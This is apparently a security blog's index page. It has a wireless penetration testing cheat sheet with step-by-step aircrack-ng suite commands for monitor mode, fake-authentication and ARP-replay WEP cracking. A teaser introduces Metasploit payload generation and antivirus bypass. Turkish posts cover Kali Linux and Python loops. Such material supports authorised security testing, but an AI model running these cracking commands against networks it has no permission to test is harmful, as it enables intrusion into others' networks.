Linux
Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]
WIRELESS ANTENNA
Kill Monitor Processes
root@uceka:~# airmon-ng check kill
Open the Monitor Mode
root@uceka:~# ifconfig wlan0 down root@uceka:~# airmon-ng start wlan0 # if you get an error with airmon-ng command, try this ; # iwconfig wlan0 mode monitor # use wlan0 instead of wlan0mon root@uceka:~# ifconfig wlan0 up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0 root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto> #txpower is 30 (generally) #txpower is depends your country, please googling root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
Driver Install (Kali – Alfa Adapter)
root@uceka:~# sudo apt update root@uceka:~# sudo apt upgrade -y root@uceka:~# sudo apt dist-upgrade -y root@uceka:~# sudo reboot now root@uceka:~# sudo apt update root@uceka:~# sudo apt install realtek-rtl88xxau-dkms root@uceka:~# sudo apt install dkms root@uceka:~# git clone https://github.com/aircrack-ng/rtl8812au root@uceka:~# cd rtl8812au/ root@uceka:~# sudo make root@uceka:~# sudo make install
Scan
root@uceka:~# airodump-ng wlan0mon # or root@uceka:~# wifite
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>
Generating Payloads & Anti-Virus Bypass Methods
Hi everyone… This article aboot is malicious stuff. How we can create payload? How we can connect & listen other’s pc… Yeap,they are all possible with Metasploit or other similar tools. Also; it’s safe for you. You don’t need to use any stealer,keylogger,crypter… Metasploit already has all of it 😉
Follow my steps…
My test machine is ; Windows 7 on the Virtual Machine & Windows 8 Local host ip : 10.34.0.62 (Backtrack 5 R3) Local port : 4444
You can start with msfconsole or you can directly call meterpreter…
Read the rest of this entry »
Backtrack 6 Çıktı!
BackTrack Linux’un ilk versiyonu 7 yıl önce yayınlanmıştı… Günümüzde dünyada en yaygın kullanılan Linux dağıtımlarından birisi haline gelen BackTrack; pentest ve güvenlik alanında çalışmalar yapan kişiler için vazgeçilmez bir araç.
BackTrack’ın geliştiricileri yaklaşık olarak bir yıl kadar önce BackTrack 6 hakkında beyin fırtınası yapmaya başlamışlar. En sonunda Kali Linux adında çıkardıkları bu dağıtım, pek çok yenilik barındırmakta… Debian temelli bir dağıtım olan Kali Linux ile Backtrack arasında ne gibi farklar var derseniz eğer; geliştiriciler bu karşılaştırmayı yaparken “çok şey” ve “hiçbir şey” diye ifade ediyorlar. Aslında sizin BackTrack’ı hangi amaçlarda kullandığınız ile ilgili olarak aradaki farklar da değişiyor. Bu dağıtımın en büyük yeniliklerinden birisi de; cep telefonları, tablet ve bazı bilgisayar vb. kullanılan ARM işlemci destekleyen cihazlarda içinde kullanılabilmesi.
Tamamen ücretsiz olan bu dağıtım 300’den fazla pentest aracı içermekte.Örnek ekran görüntüleri;
Read the rest of this entry »
Python Programlama – 2
Python programlama yazı serisinin ikinci kısmını içerecek bu yazıda; örneklerle döngüler, fonksiyonlar ve nesne-sınıf yaplarını anlatmaya çalışacağım. Bu yazı serisinin ilk kısmına buradan erişebilirsiniz.
Döngüler
‘While’ Döngüsü
Bilindiği üzere “while” komutu algoritmik notasyonlarda ‘.. olduğu sürece’ anlamına gelmektedir. Örneğin ;
Read the rest of this entry »